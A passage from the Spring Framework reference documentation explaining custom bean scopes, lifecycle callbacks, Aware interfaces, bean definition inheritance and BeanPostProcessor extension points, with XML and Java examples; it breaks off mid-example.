is declared on the `ConfigurableBeanFactory` interface, which is available\non most of the concrete `ApplicationContext` implementations that ship with Spring via\nthe BeanFactory property.\n\nThe first argument to the `registerScope(..)` method is the unique name associated with\na scope; examples of such names in the Spring container itself are `singleton` and\n`prototype`. The second argument to the `registerScope(..)` method is an actual instance\nof the custom `Scope` implementation that you wish to register and use.\n\nSuppose that you write your custom `Scope` implementation, and then register it as below.\n\n[NOTE]\n====\nThe example below uses `SimpleThreadScope` which is included with Spring, but not\nregistered by default. The instructions would be the same for your own custom `Scope`\nimplementations.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tScope threadScope = new SimpleThreadScope();\n\tbeanFactory.registerScope(\"thread\", threadScope);\n----\n\nYou then create bean definitions that adhere to the scoping rules of your custom `Scope`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"...\" class=\"...\" scope=\"thread\">\n----\n\nWith a custom `Scope` implementation, you are not limited to programmatic registration\nof the scope. You can also do the `Scope` registration declaratively, using the\n`CustomScopeConfigurer` class:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:aop=\"http:\/\/www.springframework.org\/schema\/aop\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\/spring-aop.xsd\">\n\n\t\t<bean class=\"org.springframework.beans.factory.config.CustomScopeConfigurer\">\n\t\t\t<property name=\"scopes\">\n\t\t\t\t<map>\n\t\t\t\t\t<entry key=\"thread\">\n\t\t\t\t\t\t<bean class=\"org.springframework.context.support.SimpleThreadScope\"\/>\n\t\t\t\t\t<\/entry>\n\t\t\t\t<\/map>\n\t\t\t<\/property>\n\t\t<\/bean>\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\" scope=\"thread\">\n\t\t\t<property name=\"name\" value=\"Rick\"\/>\n\t\t\t<aop:scoped-proxy\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<property name=\"bar\" ref=\"bar\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nWhen you place `<aop:scoped-proxy\/>` in a `FactoryBean` implementation, it is the factory\nbean itself that is scoped, not the object returned from `getObject()`.\n====\n\n\n\n\n[[beans-factory-nature]]\n== Customizing the nature of a bean\n\n\n\n[[beans-factory-lifecycle]]\n=== Lifecycle callbacks\n\nTo interact with the container's management of the bean lifecycle, you can implement the\nSpring `InitializingBean` and `DisposableBean` interfaces. The container calls\n`afterPropertiesSet()` for the former and `destroy()` for the latter to allow the bean\nto perform certain actions upon initialization and destruction of your beans.\n\n[TIP]\n====\nThe JSR-250 `@PostConstruct` and `@PreDestroy` annotations are generally considered best\npractice for receiving lifecycle callbacks in a modern Spring application. Using these\nannotations means that your beans are not coupled to Spring specific interfaces. For\ndetails see <<beans-postconstruct-and-predestroy-annotations>>.\n\nIf you don't want to use the JSR-250 annotations but you are still looking to remove\ncoupling consider the use of init-method and destroy-method object definition metadata.\n====\n\nInternally, the Spring Framework uses `BeanPostProcessor` implementations to process any\ncallback interfaces it can find and call the appropriate methods. If you need custom\nfeatures or other lifecycle behavior Spring does not offer out-of-the-box, you can\nimplement a `BeanPostProcessor` yourself. For more information, see\n<<beans-factory-extension>>.\n\nIn addition to the initialization and destruction callbacks, Spring-managed objects may\nalso implement the `Lifecycle` interface so that those objects can participate in the\nstartup and shutdown process as driven by the container's own lifecycle.\n\nThe lifecycle callback interfaces are described in this section.\n\n\n[[beans-factory-lifecycle-initializingbean]]\n==== Initialization callbacks\n\nThe `org.springframework.beans.factory.InitializingBean` interface allows a bean to\nperform initialization work after all necessary properties on the bean have been set by\nthe container. The `InitializingBean` interface specifies a single method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid afterPropertiesSet() throws Exception;\n----\n\nIt is recommended that you do not use the `InitializingBean` interface because it\nunnecessarily couples the code to Spring. Alternatively, use\nthe <<beans-postconstruct-and-predestroy-annotations, `@PostConstruct`>> annotation or\nspecify a POJO initialization method. In the case of XML-based configuration metadata,\nyou use the `init-method` attribute to specify the name of the method that has a void\nno-argument signature. With Java config, you use the `initMethod` attribute of `@Bean`,\nsee <<beans-java-lifecycle-callbacks>>. For example, the following:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.ExampleBean\" init-method=\"init\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tpublic void init() {\n\t\t\t\/\/ do some initialization work\n\t\t}\n\n\t}\n----\n\n...is exactly the same as...\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.AnotherExampleBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AnotherExampleBean implements InitializingBean {\n\n\t\tpublic void afterPropertiesSet() {\n\t\t\t\/\/ do some initialization work\n\t\t}\n\n\t}\n----\n\nbut does not couple the code to Spring.\n\n\n[[beans-factory-lifecycle-disposablebean]]\n==== Destruction callbacks\n\nImplementing the `org.springframework.beans.factory.DisposableBean` interface allows a\nbean to get a callback when the container containing it is destroyed. The\n`DisposableBean` interface specifies a single method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid destroy() throws Exception;\n----\n\nIt is recommended that you do not use the `DisposableBean` callback interface because it\nunnecessarily couples the code to Spring. Alternatively, use\nthe <<beans-postconstruct-and-predestroy-annotations, `@PreDestroy`>> annotation or\nspecify a generic method that is supported by bean definitions. With XML-based\nconfiguration metadata, you use the `destroy-method` attribute on the `<bean\/>`.\nWith Java config, you use the `destroyMethod` attribute of `@Bean`, see\n<<beans-java-lifecycle-callbacks>>. For example, the following definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.ExampleBean\" destroy-method=\"cleanup\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tpublic void cleanup() {\n\t\t\t\/\/ do some destruction work (like releasing pooled connections)\n\t\t}\n\n\t}\n----\n\nis exactly the same as:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.AnotherExampleBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AnotherExampleBean implements DisposableBean {\n\n\t\tpublic void destroy() {\n\t\t\t\/\/ do some destruction work (like releasing pooled connections)\n\t\t}\n\n\t}\n----\n\nbut does not couple the code to Spring.\n\n[TIP]\n====\nThe `destroy-method` attribute of a `<bean>` element can be assigned a special\n`(inferred)` value which instructs Spring to automatically detect a public `close` or\n`shutdown` method on the specific bean class (any class that implements\n`java.lang.AutoCloseable` or `java.io.Closeable` would therefore match). This special\n`(inferred)` value can also be set on the `default-destroy-method` attribute of a\n`<beans>` element to apply this behavior to an entire set of beans (see\n<<beans-factory-lifecycle-default-init-destroy-methods>>). Note that this is the\ndefault behavior with Java config.\n====\n\n[[beans-factory-lifecycle-default-init-destroy-methods]]\n==== Default initialization and destroy methods\n\nWhen you write initialization and destroy method callbacks that do not use the\nSpring-specific `InitializingBean` and `DisposableBean` callback interfaces, you\ntypically write methods with names such as `init()`, `initialize()`, `dispose()`, and so\non. Ideally, the names of such lifecycle callback methods are standardized across a\nproject so that all developers use the same method names and ensure consistency.\n\nYou can configure the Spring container to `look` for named initialization and destroy\ncallback method names on __every__ bean. This means that you, as an application\ndeveloper, can write your application classes and use an initialization callback called\n`init()`, without having to configure an `init-method=\"init\"` attribute with each bean\ndefinition. The Spring IoC container calls that method when the bean is created (and in\naccordance with the standard lifecycle callback contract described previously). This\nfeature also enforces a consistent naming convention for initialization and destroy\nmethod callbacks.\n\nSuppose that your initialization callback methods are named `init()` and destroy\ncallback methods are named `destroy()`. Your class will resemble the class in the\nfollowing example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultBlogService implements BlogService {\n\n\t\tprivate BlogDao blogDao;\n\n\t\tpublic void setBlogDao(BlogDao blogDao) {\n\t\t\tthis.blogDao = blogDao;\n\t\t}\n\n\t\t\/\/ this is (unsurprisingly) the initialization callback method\n\t\tpublic void init() {\n\t\t\tif (this.blogDao == null) {\n\t\t\t\tthrow new IllegalStateException(\"The [blogDao] property must be set.\");\n\t\t\t}\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans default-init-method=\"init\">\n\n\t\t<bean id=\"blogService\" class=\"com.foo.DefaultBlogService\">\n\t\t\t<property name=\"blogDao\" ref=\"blogDao\" \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nThe presence of the `default-init-method` attribute on the top-level `<beans\/>` element\nattribute causes the Spring IoC container to recognize a method called `init` on beans\nas the initialization method callback. When a bean is created and assembled, if the bean\nclass has such a method, it is invoked at the appropriate time.\n\nYou configure destroy method callbacks similarly (in XML, that is) by using the\n`default-destroy-method` attribute on the top-level `<beans\/>` element.\n\nWhere existing bean classes already have callback methods that are named at variance\nwith the convention, you can override the default by specifying (in XML, that is) the\nmethod name using the `init-method` and `destroy-method` attributes of the `<bean\/>`\nitself.\n\nThe Spring container guarantees that a configured initialization callback is called\nimmediately after a bean is supplied with all dependencies. Thus the initialization\ncallback is called on the raw bean reference, which means that AOP interceptors and so\nforth are not yet applied to the bean. A target bean is fully created __first__,\n__then__ an AOP proxy (for example) with its interceptor chain is applied. If the target\nbean and the proxy are defined separately, your code can even interact with the raw\ntarget bean, bypassing the proxy. Hence, it would be inconsistent to apply the\ninterceptors to the init method, because doing so would couple the lifecycle of the\ntarget bean with its proxy\/interceptors and leave strange semantics when your code\ninteracts directly to the raw target bean.\n\n\n[[beans-factory-lifecycle-combined-effects]]\n==== Combining lifecycle mechanisms\n\nAs of Spring 2.5, you have three options for controlling bean lifecycle behavior: the\n<<beans-factory-lifecycle-initializingbean, `InitializingBean`>> and\n<<beans-factory-lifecycle-disposablebean, `DisposableBean`>> callback interfaces; custom\n`init()` and `destroy()` methods; and the\n<<beans-postconstruct-and-predestroy-annotations, `@PostConstruct` and `@PreDestroy`\nannotations>>. You can combine these mechanisms to control a given bean.\n\n[NOTE]\n====\nIf multiple lifecycle mechanisms are configured for a bean, and each mechanism is\nconfigured with a different method name, then each configured method is executed in the\norder listed below. However, if the same method name is configured - for example,\n`init()` for an initialization method - for more than one of these lifecycle mechanisms,\nthat method is executed once, as explained in the preceding section.\n====\n\nMultiple lifecycle mechanisms configured for the same bean, with different\ninitialization methods, are called as follows:\n\n* Methods annotated with `@PostConstruct`\n* `afterPropertiesSet()` as defined by the `InitializingBean` callback interface\n* A custom configured `init()` method\n\nDestroy methods are called in the same order:\n\n* Methods annotated with `@PreDestroy`\n* `destroy()` as defined by the `DisposableBean` callback interface\n* A custom configured `destroy()` method\n\n\n[[beans-factory-lifecycle-processor]]\n==== Startup and shutdown callbacks\n\nThe `Lifecycle` interface defines the essential methods for any object that has its own\nlifecycle requirements (e.g. starts and stops some background process):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Lifecycle {\n\n\t\tvoid start();\n\n\t\tvoid stop();\n\n\t\tboolean isRunning();\n\n\t}\n----\n\nAny Spring-managed object may implement that interface. Then, when the\n`ApplicationContext` itself receives start and stop signals, e.g. for a stop\/restart\nscenario at runtime, it will cascade those calls to all `Lifecycle` implementations\ndefined within that context. It does this by delegating to a `LifecycleProcessor`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface LifecycleProcessor extends Lifecycle {\n\n\t\tvoid onRefresh();\n\n\t\tvoid onClose();\n\n\t}\n----\n\nNotice that the `LifecycleProcessor` is itself an extension of the `Lifecycle`\ninterface. It also adds two other methods for reacting to the context being refreshed\nand closed.\n\n[TIP]\n====\nNote that the regular `org.springframework.context.Lifecycle` interface is just a plain\ncontract for explicit start\/stop notifications and does NOT imply auto-startup at context\nrefresh time. Consider implementing `org.springframework.context.SmartLifecycle` instead\nfor fine-grained control over auto-startup of a specific bean (including startup phases).\nAlso, please note that stop notifications are not guaranteed to come before destruction:\nOn regular shutdown, all `Lifecycle` beans will first receive a stop notification before\nthe general destruction callbacks are being propagated; however, on hot refresh during a\ncontext's lifetime or on aborted refresh attempts, only destroy methods will be called.\n====\n\nThe order of startup and shutdown invocations can be important. If a \"depends-on\"\nrelationship exists between any two objects, the dependent side will start __after__ its\ndependency, and it will stop __before__ its dependency. However, at times the direct\ndependencies are unknown. You may only know that objects of a certain type should start\nprior to objects of another type. In those cases, the `SmartLifecycle` interface defines\nanother option, namely the `getPhase()` method as defined on its super-interface,\n`Phased`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Phased {\n\n\t\tint getPhase();\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface SmartLifecycle extends Lifecycle, Phased {\n\n\t\tboolean isAutoStartup();\n\n\t\tvoid stop(Runnable callback);\n\n\t}\n----\n\nWhen starting, the objects with the lowest phase start first, and when stopping, the\nreverse order is followed. Therefore, an object that implements `SmartLifecycle` and\nwhose `getPhase()` method returns `Integer.MIN_VALUE` would be among the first to start\nand the last to stop. At the other end of the spectrum, a phase value of\n`Integer.MAX_VALUE` would indicate that the object should be started last and stopped\nfirst (likely because it depends on other processes to be running). When considering the\nphase value, it's also important to know that the default phase for any \"normal\"\n`Lifecycle` object that does not implement `SmartLifecycle` would be 0. Therefore, any\nnegative phase value would indicate that an object should start before those standard\ncomponents (and stop after them), and vice versa for any positive phase value.\n\nAs you can see the stop method defined by `SmartLifecycle` accepts a callback. Any\nimplementation __must__ invoke that callback's `run()` method after that implementation's\nshutdown process is complete. That enables asynchronous shutdown where necessary since\nthe default implementation of the `LifecycleProcessor` interface,\n`DefaultLifecycleProcessor`, will wait up to its timeout value for the group of objects\nwithin each phase to invoke that callback. The default per-phase timeout is 30 seconds.\nYou can override the default lifecycle processor instance by defining a bean named\n\"lifecycleProcessor\" within the context. If you only want to modify the timeout, then\ndefining the following would be sufficient:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"lifecycleProcessor\" class=\"org.springframework.context.support.DefaultLifecycleProcessor\">\n\t\t<!-- timeout value in milliseconds -->\n\t\t<property name=\"timeoutPerShutdownPhase\" value=\"10000\"\/>\n\t<\/bean>\n----\n\nAs mentioned, the `LifecycleProcessor` interface defines callback methods for the\nrefreshing and closing of the context as well. The latter will simply drive the shutdown\nprocess as if `stop()` had been called explicitly, but it will happen when the context is\nclosing. The 'refresh' callback on the other hand enables another feature of\n`SmartLifecycle` beans. When the context is refreshed (after all objects have been\ninstantiated and initialized), that callback will be invoked, and at that point the\ndefault lifecycle processor will check the boolean value returned by each\n`SmartLifecycle` object's `isAutoStartup()` method. If \"true\", then that object will be\nstarted at that point rather than waiting for an explicit invocation of the context's or\nits own `start()` method (unlike the context refresh, the context start does not happen\nautomatically for a standard context implementation). The \"phase\" value as well as any\n\"depends-on\" relationships will determine the startup order in the same way as described\nabove.\n\n\n[[beans-factory-shutdown]]\n==== Shutting down the Spring IoC container gracefully in non-web applications\n\n[NOTE]\n====\nThis section applies only to non-web applications. Spring's web-based\n`ApplicationContext` implementations already have code in place to shut down the Spring\nIoC container gracefully when the relevant web application is shut down.\n====\n\nIf you are using Spring's IoC container in a non-web application environment; for\nexample, in a rich client desktop environment; you register a shutdown hook with the\nJVM. Doing so ensures a graceful shutdown and calls the relevant destroy methods on your\nsingleton beans so that all resources are released. Of course, you must still configure\nand implement these destroy callbacks correctly.\n\nTo register a shutdown hook, you call the `registerShutdownHook()` method that is\ndeclared on the `ConfigurableApplicationContext` interface:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ConfigurableApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\n\tpublic final class Boot {\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\n\t\t\tConfigurableApplicationContext ctx = new ClassPathXmlApplicationContext(\n\t\t\t\t\tnew String []{\"beans.xml\"});\n\n\t\t\t\/\/ add a shutdown hook for the above context...\n\t\t\tctx.registerShutdownHook();\n\n\t\t\t\/\/ app runs here...\n\n\t\t\t\/\/ main method exits, hook is called prior to the app shutting down...\n\n\t\t}\n\t}\n----\n\n\n\n[[beans-factory-aware]]\n=== ApplicationContextAware and BeanNameAware\n\nWhen an `ApplicationContext` creates an object instance that implements the\n`org.springframework.context.ApplicationContextAware` interface, the instance is provided\nwith a reference to that `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface ApplicationContextAware {\n\n\t\tvoid setApplicationContext(ApplicationContext applicationContext) throws BeansException;\n\n\t}\n----\n\nThus beans can manipulate programmatically the `ApplicationContext` that created them,\nthrough the `ApplicationContext` interface, or by casting the reference to a known\nsubclass of this interface, such as `ConfigurableApplicationContext`, which exposes\nadditional functionality. One use would be the programmatic retrieval of other beans.\nSometimes this capability is useful; however, in general you should avoid it, because it\ncouples the code to Spring and does not follow the Inversion of Control style, where\ncollaborators are provided to beans as properties. Other methods of the\n`ApplicationContext` provide access to file resources, publishing application events, and\naccessing a `MessageSource`. These additional features are described in\n<<context-introduction>>\n\nAs of Spring 2.5, autowiring is another alternative to obtain reference to the\n`ApplicationContext`. The \"traditional\" `constructor` and `byType` autowiring modes (as\ndescribed in <<beans-factory-autowire>>) can provide a dependency of type\n`ApplicationContext` for a constructor argument or setter method parameter,\nrespectively. For more flexibility, including the ability to autowire fields and\nmultiple parameter methods, use the new annotation-based autowiring features. If you do,\nthe `ApplicationContext` is autowired into a field, constructor argument, or method\nparameter that is expecting the `ApplicationContext` type if the field, constructor, or\nmethod in question carries the `@Autowired` annotation. For more information, see\n<<beans-autowired-annotation>>.\n\nWhen an `ApplicationContext` creates a class that implements the\n`org.springframework.beans.factory.BeanNameAware` interface, the class is provided with\na reference to the name defined in its associated object definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface BeanNameAware {\n\n\t\tvoid setBeanName(String name) throws BeansException;\n\n\t}\n----\n\nThe callback is invoked after population of normal bean properties but before an\ninitialization callback such as `InitializingBean` __afterPropertiesSet__ or a custom\ninit-method.\n\n\n\n[[aware-list]]\n=== Other Aware interfaces\n\nBesides `ApplicationContextAware` and `BeanNameAware` discussed above, Spring offers a\nrange of `Aware` interfaces that allow beans to indicate to the container that they\nrequire a certain __infrastructure__ dependency. The most important `Aware` interfaces\nare summarized below - as a general rule, the name is a good indication of the\ndependency type:\n\n[[beans-factory-nature-aware-list]]\n.Aware interfaces\n|===\n| Name| Injected Dependency| Explained in...\n\n| `ApplicationContextAware`\n| Declaring `ApplicationContext`\n| <<beans-factory-aware>>\n\n| `ApplicationEventPublisherAware`\n| Event publisher of the enclosing `ApplicationContext`\n| <<context-introduction>>\n\n| `BeanClassLoaderAware`\n| Class loader used to load the bean classes.\n| <<beans-factory-class>>\n\n| `BeanFactoryAware`\n| Declaring `BeanFactory`\n| <<beans-factory-aware>>\n\n| `BeanNameAware`\n| Name of the declaring bean\n| <<beans-factory-aware>>\n\n| `BootstrapContextAware`\n| Resource adapter `BootstrapContext` the container runs in. Typically available only in\n JCA aware ``ApplicationContext``s\n| <<cci>>\n\n| `LoadTimeWeaverAware`\n| Defined __weaver__ for processing class definition at load time\n| <<aop-aj-ltw>>\n\n| `MessageSourceAware`\n| Configured strategy for resolving messages (with support for parametrization and\n internationalization)\n| <<context-introduction>>\n\n| `NotificationPublisherAware`\n| Spring JMX notification publisher\n| <<jmx-notifications>>\n\n| `ResourceLoaderAware`\n| Configured loader for low-level access to resources\n| <<resources>>\n\n| `ServletConfigAware`\n| Current `ServletConfig` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n\n| `ServletContextAware`\n| Current `ServletContext` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n|===\n\nNote again that usage of these interfaces ties your code to the Spring API and does not\nfollow the Inversion of Control style. As such, they are recommended for infrastructure\nbeans that require programmatic access to the container.\n\n\n\n\n[[beans-child-bean-definitions]]\n== Bean definition inheritance\nA bean definition can contain a lot of configuration information, including constructor\narguments, property values, and container-specific information such as initialization\nmethod, static factory method name, and so on. A child bean definition inherits\nconfiguration data from a parent definition. The child definition can override some\nvalues, or add others, as needed. Using parent and child bean definitions can save a lot\nof typing. Effectively, this is a form of templating.\n\nIf you work with an `ApplicationContext` interface programmatically, child bean\ndefinitions are represented by the `ChildBeanDefinition` class. Most users do not work\nwith them on this level, instead configuring bean definitions declaratively in something\nlike the `ClassPathXmlApplicationContext`. When you use XML-based configuration\nmetadata, you indicate a child bean definition by using the `parent` attribute,\nspecifying the parent bean as the value of this attribute.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBean\" abstract=\"true\"\n\t\t\tclass=\"org.springframework.beans.TestBean\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithDifferentClass\"\n\t\t\tclass=\"org.springframework.beans.DerivedTestBean\"\n\t\t\t**parent=\"inheritedTestBean\"** init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- the age property value of 1 will be inherited from parent -->\n\t<\/bean>\n----\n\nA child bean definition uses the bean class from the parent definition if none is\nspecified, but can also override it. In the latter case, the child bean class must be\ncompatible with the parent, that is, it must accept the parent's property values.\n\nA child bean definition inherits scope, constructor argument values, property values, and\nmethod overrides from the parent, with the option to add new values. Any scope, initialization\nmethod, destroy method, and\/or `static` factory method settings that you specify will\noverride the corresponding parent settings.\n\nThe remaining settings are __always__ taken from the child definition: __depends on__,\n__autowire mode__, __dependency check__, __singleton__, __lazy init__.\n\nThe preceding example explicitly marks the parent bean definition as abstract by using\nthe `abstract` attribute. If the parent definition does not specify a class, explicitly\nmarking the parent bean definition as `abstract` is required, as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"inheritedTestBeanWithoutClass\" abstract=\"true\">\n\t\t<property name=\"name\" value=\"parent\"\/>\n\t\t<property name=\"age\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"inheritsWithClass\" class=\"org.springframework.beans.DerivedTestBean\"\n\t\t\tparent=\"inheritedTestBeanWithoutClass\" init-method=\"initialize\">\n\t\t<property name=\"name\" value=\"override\"\/>\n\t\t<!-- age will inherit the value of 1 from the parent bean definition-->\n\t<\/bean>\n----\n\nThe parent bean cannot be instantiated on its own because it is incomplete, and it is\nalso explicitly marked as `abstract`. When a definition is `abstract` like this, it is\nusable only as a pure template bean definition that serves as a parent definition for\nchild definitions. Trying to use such an `abstract` parent bean on its own, by referring\nto it as a ref property of another bean or doing an explicit `getBean()` call with the\nparent bean id, returns an error. Similarly, the container's internal\n`preInstantiateSingletons()` method ignores bean definitions that are defined as\nabstract.\n\n[NOTE]\n====\n`ApplicationContext` pre-instantiates all singletons by default. Therefore, it is\nimportant (at least for singleton beans) that if you have a (parent) bean definition\nwhich you intend to use only as a template, and this definition specifies a class, you\nmust make sure to set the __abstract__ attribute to __true__, otherwise the application\ncontext will actually (attempt to) pre-instantiate the `abstract` bean.\n====\n\n\n\n\n[[beans-factory-extension]]\n== Container Extension Points\nTypically, an application developer does not need to subclass `ApplicationContext`\nimplementation classes. Instead, the Spring IoC container can be extended by plugging in\nimplementations of special integration interfaces. The next few sections describe these\nintegration interfaces.\n\n\n\n[[beans-factory-extension-bpp]]\n=== Customizing beans using a BeanPostProcessor\n\nThe `BeanPostProcessor` interface defines __callback methods__ that you can implement to\nprovide your own (or override the container's default) instantiation logic,\ndependency-resolution logic, and so forth. If you want to implement some custom logic\nafter the Spring container finishes instantiating, configuring, and initializing a bean,\nyou can plug in one or more `BeanPostProcessor` implementations.\n\nYou can configure multiple `BeanPostProcessor` instances, and you can control the order\nin which these ``BeanPostProcessor``s execute by setting the `order` property. You can\nset this property only if the `BeanPostProcessor` implements the `Ordered` interface; if\nyou write your own `BeanPostProcessor` you should consider implementing the `Ordered`\ninterface too. For further details, consult the javadocs of the `BeanPostProcessor` and\n`Ordered` interfaces. See also the note below on\n<<beans-factory-programmatically-registering-beanpostprocessors, programmatic\nregistration of ``BeanPostProcessor``s>>.\n\n[NOTE]\n====\n``BeanPostProcessor``s operate on bean (or object) __instances__; that is to say, the\nSpring IoC container instantiates a bean instance and __then__ ``BeanPostProcessor``s do\ntheir work.\n\n``BeanPostProcessor``s are scoped __per-container__. This is only relevant if you are\nusing container hierarchies. If you define a `BeanPostProcessor` in one container, it\nwill __only__ post-process the beans in that container. In other words, beans that are\ndefined in one container are not post-processed by a `BeanPostProcessor` defined in\nanother container, even if both containers are part of the same hierarchy.\n\nTo change the actual bean definition (i.e., the __blueprint__ that defines the bean),\nyou instead need to use a `BeanFactoryPostProcessor` as described in\n<<beans-factory-extension-factory-postprocessors>>.\n====\n\nThe `org.springframework.beans.factory.config.BeanPostProcessor` interface consists of\nexactly two callback methods. When such a class is registered as a post-processor with\nthe container, for each bean instance that is created by the container, the\npost-processor gets a callback from the container both __before__ container\ninitialization methods (such as InitializingBean's __afterPropertiesSet()__ and any\ndeclared init method) are called as well as __after__ any bean initialization callbacks.\nThe post-processor can take any action with the bean instance, including ignoring the\ncallback completely. A bean post-processor typically checks for callback interfaces or\nmay wrap a bean with a proxy. Some Spring AOP infrastructure classes are implemented as\nbean post-processors in order to provide proxy-wrapping logic.\n\nAn `ApplicationContext` __automatically detects__ any beans that are defined in the\nconfiguration metadata which implement the `BeanPostProcessor` interface. The\n`ApplicationContext` registers these beans as post-processors so that they can be called\nlater upon bean creation. Bean post-processors can be deployed in the container just\nlike any other beans.\n\nNote that when declaring a `BeanPostProcessor` using an `@Bean` factory method on a\nconfiguration class, the return type of the factory method should be the implementation\nclass itself or at least the `org.springframework.beans.factory.config.BeanPostProcessor`\ninterface, clearly indicating the post-processor nature of that bean. Otherwise, the\n`ApplicationContext` won't be able to autodetect it by type before fully creating it.\nSince a `BeanPostProcessor` needs to be instantiated early in order to apply to the\ninitialization of other beans in the context, this early type detection is critical.\n\n\n[[beans-factory-programmatically-registering-beanpostprocessors]]\n.Programmatically registering BeanPostProcessors\n[NOTE]\n====\nWhile the recommended approach for `BeanPostProcessor` registration is through\n`ApplicationContext` auto-detection (as described above), it is also possible to\nregister them __programmatically__ against a `ConfigurableBeanFactory` using the\n`addBeanPostProcessor` method. This can be useful when needing to evaluate conditional\nlogic before registration, or even for copying bean post processors across contexts in a\nhierarchy. Note however that ``BeanPostProcessor``s added programmatically __do not\nrespect the `Ordered` interface__. Here it is the __order of registration__ that\ndictates the order of execution. Note also that ``BeanPostProcessor``s registered\nprogrammatically are always processed before those registered through auto-detection,\nregardless of any explicit ordering.\n====\n\n.BeanPostProcessors and AOP auto-proxying\n[NOTE]\n====\nClasses that implement the `BeanPostProcessor` interface are __special__ and are treated\ndifferently by the container. All ``BeanPostProcessor``s __and beans that they reference\ndirectly__ are instantiated on startup, as part of the special startup phase of the\n`ApplicationContext`. Next, all ``BeanPostProcessor``s are registered in a sorted fashion\nand applied to all further beans in the container. Because AOP auto-proxying is\nimplemented as a `BeanPostProcessor` itself, neither ``BeanPostProcessor``s nor the beans\nthey reference directly are eligible for auto-proxying, and thus do not have aspects\nwoven into them.\n\nFor any such bean, you should see an informational log message: \"__Bean foo is not\neligible for getting processed by all BeanPostProcessor interfaces (for example: not\neligible for auto-proxying)__\".\n\nNote that if you have beans wired into your `BeanPostProcessor` using autowiring or\n`@Resource` (which may fall back to autowiring), Spring might access unexpected beans\nwhen searching for type-matching dependency candidates, and therefore make them\nineligible for auto-proxying or other kinds of bean post-processing. For example, if you\nhave a dependency annotated with `@Resource` where the field\/setter name does not\ndirectly correspond to the declared name of a bean and no name attribute is used, then\nSpring will access other beans for matching them by type.\n====\n\nThe following examples show how to write, register, and use ``BeanPostProcessor``s in an\n`ApplicationContext`.\n\n\n[[beans-factory-extension-bpp-examples-hw]]\n==== Example: Hello World, BeanPostProcessor-style\n\nThis first example illustrates basic usage. The example shows a custom\n`BeanPostProcessor` implementation that invokes the `toString()` method of each bean as\nit is created by the container and prints the resulting string to the system console.\n\nFind below the custom `BeanPostProcessor` implementation class definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage scripting;\n\n\timport org.springframework.beans.factory.config.BeanPostProcessor;\n\timport org.springframework.beans.BeansException;\n\n\tpublic class InstantiationTracingBeanPostProcessor implements BeanPostProcessor {\n\n\t\t\/\/ simply return the instantiated bean as-is\n\t\tpublic Object postProcessBeforeInitialization(Object bean,\n\t\t\t\tString beanName) throws BeansException {\n\t\t\treturn bean; \/\/ we could potentially return any object reference here...\n\t\t}\n\n\t\tpublic Object 